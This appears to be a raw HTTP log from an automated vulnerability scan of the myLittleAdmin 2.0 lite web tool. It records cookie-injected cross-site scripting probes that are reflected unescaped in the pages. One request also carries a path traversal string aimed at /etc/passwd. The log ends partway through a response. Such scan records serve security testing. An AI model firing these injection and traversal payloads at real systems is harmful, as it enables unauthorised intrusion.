GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=%3C%2Fa+style%3Dx%3Aexpre%2F%2A%2A%2Fssion%28netsparker%280x0003E5%29%29%3E&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GGHDKDPDJGDBNDNCELJMJFEF
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:02 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:02 GMT
Content-Length: 1632


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=</a style=x:expre/**/ssion(netsparker(0x0003E5))>;Address=</a style=x:expre/**/ssion(netsparker(0x0003E5))>,3;Network =3;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000410%29%3C%2Fscript%3E; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:55 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:55 GMT
Content-Length: 1570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn='"--></style></script><script>netsparker(0x000410)</script>;uid=3;pwd=3
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000411%29%3C%2Fscript%3E&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:57 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:57 GMT
Content-Length: 1568


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn=3;uid=3;pwd='"--></style></script><script>netsparker(0x000411)</script>
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsn.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=%3Cscript%3Ens%280x00043A%29%3C%2Fscript%3E&Dsn=3; ASPSESSIONIDQATCTSCC=GJHDKDPDALCMCCMPALHFACAM
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:48:18 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:48:18 GMT
Content-Length: 1554


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
dsn=3;uid=<script>ns(0x00043A)</script>;pwd=3
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000460%29%3C%2Fscript%3E&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=IKHDKDPDABPMECOBFKBBJAGC
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:48:48 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:48:48 GMT
Content-Length: 1622


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=3;Address=3,3;Network ='"--></style></script><script>netsparker(0x000460)</script>;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
